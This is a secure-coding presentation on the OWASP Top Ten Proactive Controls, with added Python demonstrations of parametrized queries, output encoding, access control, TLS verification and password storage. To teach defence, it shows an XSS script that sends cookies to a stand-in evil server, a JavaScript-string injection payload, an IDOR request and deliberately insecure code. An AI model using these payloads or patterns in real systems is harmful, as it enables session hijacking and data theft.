Ten Commandments of Secure Coding
OWASP Top Ten Proactive Controls
Mateusz Olejarka
OWASP Poland
Mateusz Olejarka @molejarka
• Senior IT Security Consultant @SecuRing
• Ex-developer
• OWASP Poland since 2011
OWASP
O = Open
• Docs & tools
– free
– Creative Commons license
– open source
• Built with open collaboration in mind
– Each one of you can join
OWASP Poland Chapter
• Since 2007
• Meetings: Kraków, Poznań, Warszawa
• Free entry
• Supporters:
4Developers 2014* questionnaire
* SecuRing’s study „Praktyki wytwarzania bezpiecznego oprogramowania w polskich firmach – 2014” ("Secure software development practices in Polish companies – 2014")
• 62% of companies do not educate programmers on application security
• >50% of companies do not consider security during the design stage
• 73% of participants confirmed that they had fixed security-related issues
• only 42% confirmed that they do security testing before production deployment
OWASP Top10 Risk vs OWASP Top10 Proactive Controls
Disclaimer
• Do not base your application security on the Top 10 alone *
– It is purely educational material
– Each application has its own risk profile
Thou shalt parametrize queries
1: Parametrize queries
SQL/LDAP/XML/cmd/…-injection
Easily exploitable
• Simple to use tools exist
Devastating impact
Source: http://xkcd.com/327/
Best practices
#1 Prepared Statements / Parametrized Queries
#2 Stored Procedures
– Watch for exceptions! (eval, dynamic blocks, etc.)
#3 Escaping
– risky!
    // Values come straight from the request, but they are bound as
    // parameters and never concatenated into the SQL text.
    String newName = request.getParameter("newName");
    String id = request.getParameter("id");
    PreparedStatement pstmt = con.prepareStatement(
        "UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?");
    pstmt.setString(1, newName);
    pstmt.setString(2, id);
    pstmt.executeUpdate();
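The same UPDATE run both ways, as an added example (not from the slides, and in Python with SQLite rather than the slide's Java/JDBC): the concatenated statement breaks on a perfectly legitimate name containing a quote, which is exactly the parsing failure an injection abuses, while the parametrized statement stores it correctly. The EMPLOYEES table and its rows are constructed here so the script runs offline.

```python
"""Parametrized query vs string concatenation on an in-memory SQLite table."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Create a constructed EMPLOYEES table with two sample rows."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE EMPLOYEES (ID INTEGER PRIMARY KEY, NAME TEXT)")
    con.executemany("INSERT INTO EMPLOYEES VALUES (?, ?)",
                    [(1, "Alice"), (2, "Bob")])
    con.commit()
    return con


def rename_concat(con: sqlite3.Connection, emp_id: str, new_name: str) -> None:
    """The anti-pattern: user input is pasted into the SQL text, so any quote
    or operator in the input is parsed as part of the statement."""
    sql = f"UPDATE EMPLOYEES SET NAME = '{new_name}' WHERE ID = '{emp_id}'"
    con.execute(sql)
    con.commit()


def rename_param(con: sqlite3.Connection, emp_id: str, new_name: str) -> None:
    """The slide's PreparedStatement pattern: the SQL text is fixed and the
    driver passes the values separately, so input is never parsed as SQL."""
    con.execute("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?", (new_name, emp_id))
    con.commit()


def names(con: sqlite3.Connection) -> dict:
    """Current ID -> NAME mapping."""
    return dict(con.execute("SELECT ID, NAME FROM EMPLOYEES ORDER BY ID"))


def demo() -> dict:
    """Run both paths on the same legitimate input and report what happened."""
    new_name = "O'Brien"            # an ordinary name that contains a quote
    con = make_db()
    try:
        rename_concat(con, "1", new_name)
        concat_result = names(con)[1]
    except sqlite3.OperationalError as exc:   # the statement itself broke
        concat_result = f"SQL syntax error: {exc}"
    rename_param(con, "1", new_name)
    return {"concat": concat_result, "param": names(con)[1]}


if __name__ == "__main__":
    print(demo())
```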
References
• Bobby Tables: A guide to preventing SQL injection
• Query Parameterization Cheat Sheet
• SQL Injection Prevention Cheat Sheet
• OWASP Secure Coding Practices Quick Reference Guide
Thou shalt encode data
2: Encode Data
XSS
• Site defacement
• Session hijacking
    <script>document.body.innerHTML = "Jim was here";</script>

    <script>
    var img = new Image();
    img.src = "http://<some evil server>.com?" + document.cookie;
    </script>
Results of missing encoding
• Session hijacking
• Network scanning
• CSRF prevention bypass
• Site defacement (browser)
• …
• Browser hijack
– see BeEF
Cross Site Scripting
But when we write output inside pure JavaScript:
    <script> var split='<bean:write name="transferFormId" property="trn_recipient">'; splitRecipient(split); </script>
With trn_recipient set to:
    ';alert('xss');--
the rendered page contains:
    <script> var split='';alert('xss');--
Best practices
• Special character encoding has to be context-aware
– HTML element
– HTML attribute
– JavaScript
– JSON
– CSS / style
– URL
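The JavaScript-string case from the previous slide, worked through as an added example (not from the slides): the template and the payload are the ones shown above, and the check confirms whether the emitted string literal survives intact under no encoding, under an HTML encoder that leaves the apostrophe alone (as several do), and under the \xHH encoding the XSS Prevention Cheat Sheet prescribes for JavaScript string context.

```python
"""Context-aware output encoding for a value placed in a JavaScript string."""
import html
import re
import string

PAYLOAD = "';alert('xss');--"        # the slide's test value for trn_recipient
_ALNUM = set(string.ascii_letters + string.digits)


def encode_for_js_string(value: str) -> str:
    """Escape every character except [A-Za-z0-9] as \\xHH (or \\uHHHH for
    non-ASCII). Inside a quoted JS string no escaped character can end the
    string, start a comment, or close the <script> element."""
    out = []
    for ch in value:
        if ch in _ALNUM:
            out.append(ch)
        elif ord(ch) < 0x100:
            out.append("\\x%02x" % ord(ch))
        else:
            out.append("\\u%04x" % ord(ch))
    return "".join(out)


def decode_js_string(literal: str) -> str:
    """What the JavaScript engine makes of the escaped literal (round-trip check)."""
    return re.sub(r"\\x([0-9a-fA-F]{2})|\\u([0-9a-fA-F]{4})",
                  lambda m: chr(int(m.group(1) or m.group(2), 16)), literal)


def render_script(recipient: str, encoder) -> str:
    """Emit the slide's script block with the given encoder applied."""
    return "<script> var split='%s'; splitRecipient(split); </script>" % encoder(recipient)


def js_string_is_intact(rendered: str) -> bool:
    """True when the emitted 'split' literal is still one string: nothing
    inside it can close the quote, escape, break the line, or close the tag."""
    m = re.search(r"var split='(.*?)'; splitRecipient", rendered, re.S)
    if not m:
        return False
    # Drop the legal \xHH / \uHHHH escapes; anything dangerous left over means
    # the encoder used was wrong for this context.
    stripped = re.sub(r"\\x[0-9a-fA-F]{2}|\\u[0-9a-fA-F]{4}", "", m.group(1))
    return not re.search(r"['\\\r\n]|</", stripped)


def compare_encoders() -> dict:
    """Render the slide's payload with three encoders; report which survive."""
    return {
        "none": js_string_is_intact(render_script(PAYLOAD, lambda s: s)),
        # HTML entity encoding that skips the apostrophe: right for an HTML
        # element body, wrong for a JS string.
        "html_entity": js_string_is_intact(
            render_script(PAYLOAD, lambda s: html.escape(s, quote=False))),
        "js_string": js_string_is_intact(
            render_script(PAYLOAD, encode_for_js_string)),
    }


if __name__ == "__main__":
    print(compare_encoders())
    print(render_script(PAYLOAD, encode_for_js_string))
```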
References
• XSS (Cross Site Scripting) Prevention Cheat Sheet
• Java Encoder Project
• Microsoft .NET AntiXSS Library
• OWASP ESAPI
• Encoder Comparison Reference Project
Thou shalt validate all inputs
3: Validate All Inputs
Why validate anything?
• Most other vulnerabilities (e.g. injections, XSS, …) also stem from missing input validation
• Validation is like a firewall
– It does not protect you against everything
– …but it is nice to have
Best practices
• Prefer a whitelist over a blacklist approach
• Use strongly typed fields
– One validator per data type
– Easier to integrate a WAF
• Validation = first line of defence
– For example, type casting prevents injection
– But it is not the only one!
References
• Input Validation Cheat Sheet
• Apache Commons Validator
• OWASP JSON Sanitizer Project
• OWASP Java HTML Sanitizer Project
• Google Caja
Thou shalt implement appropriate access controls
4: Implement Appropriate Access Controls
Account history
HTTP request
    GET /services/history/account/85101022350445200448009906 HTTP/1.1
    SA-DeviceId: 940109f08ba56a89
    SA-SessionId: 826175
    Accept: application/json
    Host: acc
    Connection: Keep-Alive
    User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Same session, different account id:
    GET /services/history/account/45101022350445200448005388 HTTP/1.1
    SA-DeviceId: 940109f08ba56a89
    SA-SessionId: 826175
    Accept: application/json
    Host: acc
    Connection: Keep-Alive
    User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Changing only the account id returns another user's data.
Best practices
• The server makes the final call!
• Default deny
• All requests must go through access control
– centralized, easy-to-use mechanism
• Access control rules (policy) should be separated from the code
– Not a part of it
    // Role-based check
    if (currentUser.hasRole("administrator")) {
        // allow
    } else {
        // deny
    }

    // Permission-based check (Apache Shiro style isPermitted)
    if (currentUser.isPermitted(printPermission)) {
        // allow
    } else {
        // deny
    }
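A server-side handler for the account-history request shown above, as an added example (not from the slides). It puts every request through one central check with default deny, keeps the policy as data separate from the handler, and adds the ownership test the broken API lacked; it also applies the whitelist, strongly typed validation from the "Validate All Inputs" section to the account id. The session store, users, ownership table and history are constructed in-memory stand-ins; the account ids and session id are the ones from the slide.

```python
"""Central access control for GET /services/history/account/<id>."""
import re
from typing import List, Optional

# Constructed data: session id -> user, account id -> owning user.
SESSIONS = {"826175": "user-a", "931004": "user-b"}
ACCOUNTS = {
    "85101022350445200448009906": "user-a",
    "45101022350445200448005388": "user-b",
}
HISTORY = {acct: [f"tx for {acct[-4:]}"] for acct in ACCOUNTS}

# Policy as data, not scattered through handler code: permission -> roles.
POLICY = {"account:history:read": {"customer", "support"}}
ROLES = {"user-a": {"customer"}, "user-b": {"customer"}}

# Whitelist for the account id field: exactly 26 digits, as in the slide's ids.
ACCOUNT_ID = re.compile(r"[0-9]{26}")


class Denied(Exception):
    """Raised for every refusal; no data ever leaves on a failed check."""


def validate_account_id(raw: str) -> str:
    """Strongly typed field: reject anything that is not a 26-digit number
    before it reaches the policy check or the data store."""
    if not isinstance(raw, str) or not ACCOUNT_ID.fullmatch(raw):
        raise Denied("malformed account id")
    return raw


def is_permitted(user: str, permission: str) -> bool:
    """Permission check (the slide's isPermitted style) evaluated against POLICY."""
    return bool(ROLES.get(user, set()) & POLICY.get(permission, set()))


def account_history(session_id: str, raw_account_id: str) -> List[str]:
    """The one path to the data. Default deny: every test must pass."""
    user = SESSIONS.get(session_id)
    if user is None:
        raise Denied("no valid session")
    account_id = validate_account_id(raw_account_id)
    if not is_permitted(user, "account:history:read"):
        raise Denied("permission missing")
    # The check the slide's API lacked: the session's user must own the account.
    if ACCOUNTS.get(account_id) != user:
        raise Denied("account does not belong to the caller")
    return HISTORY[account_id]


def try_request(session_id: str, raw_account_id: str) -> Optional[List[str]]:
    """Return the history, or None when the request is denied."""
    try:
        return account_history(session_id, raw_account_id)
    except Denied:
        return None


if __name__ == "__main__":
    print(try_request("826175", "85101022350445200448009906"))   # own account
    print(try_request("826175", "45101022350445200448005388"))   # someone else's
```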
References
• Access Control Cheat Sheet
• Java Authorization Guide with Apache Shiro
– Apache Shiro Authorization features
• OWASP PHPRBAC Project
Thou shalt establish identity and authentication controls
5: Establish Identity and Authentication Controls
Example vulnerability
• Authentication with a locally stored key (on the machine)
• Process:
1. Enter login
2. Select key file, enter key password
3. We are logged in
https://...../GenerateNewKey
Best practices
• Check access control on the functions that allow changing authentication credentials
• The "chain of trust" rule
• Watch the session at the boundary!
• Do not limit the length or the character set of passwords
References
• Authentication Cheat Sheet
• Password Storage Cheat Sheet
• Forgot Password Cheat Sheet
• Session Management Cheat Sheet
Thou shalt protect data and privacy
6: Protect Data and Privacy
Example (in transit)
• SSL covers encryption and authentication
• What verifies the server's identity?
– Web applications: the browser
– Mobile / thick-client / embedded… applications: the application itself
• Common errors
– Missing certificate validation
– Missing certificate or "chain of trust" check
– Missing exception handling
Best practices (in transit)
• TLS
• For the whole application
• Cookies: "Secure" flag
• HTTP Strict Transport Security
• Strong cipher suites
• Chain of trust
• Certificate pinning
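The client side of the two slides above, as an added example (not from the slides): the "common errors" configuration, in which the application never checks the certificate, beside a context that verifies the chain of trust and hostname and refuses old protocol versions, plus a leaf-certificate pin checked in constant time. The host name, port and pinned fingerprint passed to fetch_with_pin are placeholders the caller supplies; a verification failure raises instead of being caught and ignored.

```python
"""TLS client configuration: the slide's common errors beside the fail-closed version."""
import hashlib
import hmac
import socket
import ssl


def insecure_client_context() -> ssl.SSLContext:
    """The anti-pattern: no certificate validation, so the client will talk
    to whoever answers on the port."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False          # must be switched off before CERT_NONE
    ctx.verify_mode = ssl.CERT_NONE     # chain of trust is never checked
    return ctx


def secure_client_context() -> ssl.SSLContext:
    """Chain of trust and hostname verification on, weak protocol versions off."""
    ctx = ssl.create_default_context(ssl.Purpose.SERVER_AUTH)  # system CA store
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    # check_hostname=True and verify_mode=CERT_REQUIRED are already the defaults.
    return ctx


def context_summary(ctx: ssl.SSLContext) -> dict:
    """The three settings worth asserting on in a review or a test."""
    return {
        "check_hostname": ctx.check_hostname,
        "verify_mode": ctx.verify_mode.name,
        "minimum_version": ctx.minimum_version.name,
    }


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def fingerprint_matches(der_cert: bytes, pinned_sha256_hex: str) -> bool:
    """Pin on the leaf certificate's SHA-256 fingerprint, compared in constant time."""
    return hmac.compare_digest(sha256_hex(der_cert), pinned_sha256_hex.lower())


def fetch_with_pin(host: str, port: int, pinned_sha256_hex: str) -> bytes:
    """Connect, let the library verify chain and hostname (an ssl.SSLError
    propagates: fail closed, never catch-and-continue), then check the pin."""
    ctx = secure_client_context()
    with socket.create_connection((host, port), timeout=10) as raw:
        with ctx.wrap_socket(raw, server_hostname=host) as tls:
            leaf = tls.getpeercert(binary_form=True)
            if not fingerprint_matches(leaf, pinned_sha256_hex):
                raise ssl.SSLError("certificate pin mismatch for %s" % host)
            tls.sendall(b"GET / HTTP/1.0\r\nHost: %s\r\n\r\n" % host.encode())
            return tls.recv(4096)


if __name__ == "__main__":
    print("insecure:", context_summary(insecure_client_context()))
    print("secure:  ", context_summary(secure_client_context()))
```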
References (in transit)
• Transport Layer Protection Cheat Sheet
• Pinning Cheat Sheet
• OWASP O-Saft (SSL Audit for Testers)
Example (at rest)
• Storing passwords
• "Own" SHA1 function
    // Despite the name this is neither SHA1 nor a hash: it XORs the input with
    // a repeating key and prints the result as hex, so the stored value can be
    // XORed straight back to the password. `key` and `hexDigit` are fields of
    // the original class that the slide does not show.
    public static String encrypt(byte[] in) {
        String out = "";
        for (int i = 0; i < in.length; i++) {
            byte b = (byte) (in[i] ^ key[i % key.length]);
            out += "" + hexDigit[(b & 0xf0) >> 4] + hexDigit[b & 0x0f];
        }
        return out;
    }
Best practices (at rest)
• Do not reinvent the wheel!
– Home-brewed ciphers are evil
– Own crypto is evil
– Only libraries with a reputation!
• Strong ciphers in strong modes
– ECB is evil
– CBC: watch for "padding oracle" attacks
• Good RNG for IVs
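The "own SHA1" function from the previous slide ported to Python beside what the Password Storage Cheat Sheet asks for, as an added example (not from the slides). The port shows the property that disqualifies it: applying the same key a second time recovers the password, so it is an encoding, not a one-way hash. The replacement stores a salted, slow PBKDF2 digest and verifies in constant time. The XOR key is a constructed placeholder for the original class's `key` field.

```python
"""Reversible XOR "hash" from the slide vs a salted, slow password KDF."""
import hashlib
import hmac
import os

KEY = b"placeholder-key"      # constructed; the slide does not show its `key` array


def xor_hex(data: bytes, key: bytes = KEY) -> str:
    """Python port of the slide's encrypt(): XOR with a repeating key, then hex."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data)).hex()


def xor_hex_reverse(hex_out: str, key: bytes = KEY) -> bytes:
    """XOR is its own inverse: anyone holding the stored values and the key
    gets every password back. A real hash offers no such operation."""
    data = bytes.fromhex(hex_out)
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


PBKDF2_ROUNDS = 600_000      # deliberately slow; tune to your hardware


def hash_password(password: str, rounds: int = PBKDF2_ROUNDS) -> str:
    """Return a self-describing record: algorithm$rounds$salt$digest (hex)."""
    salt = os.urandom(16)                       # fresh random salt per password
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, rounds)
    return "pbkdf2_sha256$%d$%s$%s" % (rounds, salt.hex(), digest.hex())


def verify_password(record: str, candidate: str) -> bool:
    """Recompute with the stored salt and rounds; compare in constant time."""
    try:
        algo, rounds, salt_hex, digest_hex = record.split("$")
        if algo != "pbkdf2_sha256":
            return False
        digest = hashlib.pbkdf2_hmac("sha256", candidate.encode(),
                                     bytes.fromhex(salt_hex), int(rounds))
    except (ValueError, TypeError):             # malformed record: fail closed
        return False
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    stored = xor_hex(b"hunter2")
    print("xor 'hash':", stored, "-> recovered:", xor_hex_reverse(stored))
    rec = hash_password("hunter2")
    print("kdf record:", rec, "-> verifies:", verify_password(rec, "hunter2"))
```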
References
• Google KeyCzar
• Cryptographic Storage Cheat Sheet
• Password Storage Cheat Sheet
Thou shalt implement logging, error handling and intrusion detection
7: Implement Logging, Error Handling and Intrusion Detection
References
• Logging Cheat Sheet
• OWASP AppSensor Project
Thou shalt leverage security features of frameworks and security libraries
8: Leverage Security Features of Frameworks and Security Libraries
References
• PHP Security Cheat Sheet
• .NET Security Cheat Sheet
• Spring Security
• Apache Shiro
• OWASP Dependency Check / Track
Thou shalt include security-specific requirements
9: Include Security-Specific Requirements
Building requirements
• Attack scenarios
– How can threats reach their objectives?
– Requires experience and expertise
• Selection of security controls == REQUIREMENTS
Diagram: Threat (Who?) -> Attack scenarios (How?) -> Results (What?)
References
• OWASP Application Security Verification Standard Project
• Software Assurance Maturity Model
• Business Logic Security Cheat Sheet
• Testing for business logic (OWASP-BL-001)
Thou shalt design and architect security in
10: Design and Architect Security In
References
• Software Assurance Maturity Model (OpenSAMM)
• Application Security Verification Standard Project
• Application Security Architecture Cheat Sheet
• Attack Surface Analysis Cheat Sheet
• Threat Modeling Cheat Sheet
Summary
That was just the Top Ten!
• Each application is different
– Its risk profile should be defined (WHO? WHY?)
– Consider "compliance with existing regulations"
• A few easy steps with a big positive impact
• Developer education is worth it!
OWASP meetings
• https://www.owasp.org/index.php/Poland
• Mailing list
• Facebook: OWASP Poland Local Chapter
• Twitter: @owasppoland
Thank you!
Mateusz Olejarka
@molejarka
mateusz.olejarka@owasp.org
